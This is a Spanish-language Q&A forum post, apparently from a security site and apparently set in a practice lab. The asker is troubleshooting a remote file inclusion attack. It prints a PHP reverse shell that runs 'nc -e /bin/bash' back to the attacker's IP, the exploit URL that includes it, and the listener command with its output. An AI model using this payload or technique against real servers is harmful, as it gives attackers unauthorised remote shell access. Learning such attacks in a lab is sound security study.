Problema con la dirección de shell inversa

1

En un intento por explotar la debilidad de RFI, estoy ejecutando Apache en mi caja Kali para alojar la shell inversa de php y la shell se conectó de nuevo a mi mismo (mi máquina kali).

¿Por qué obtengo una shell de mi máquina Kali en lugar del servidor web de destino?

La shell de php reverse: shell.php

<?php echo shell_exec('nc -e /bin/bash <Kali IP> 4444'); ?>

La explotación de RFI:

http://<Target IP>/vulnerabilities/fi/?page=http://<Kali IP>/shell.php

Cuando corro:

nc -nlvp 4444
connect to [192.168.60.2] from (UNKNOWN) [192.168.60.2] 46654
hostname 
kali
    
pregunta OmZ 30.01.2018 - 15:08
fuente

0 respuestas

Lea otras preguntas en las etiquetas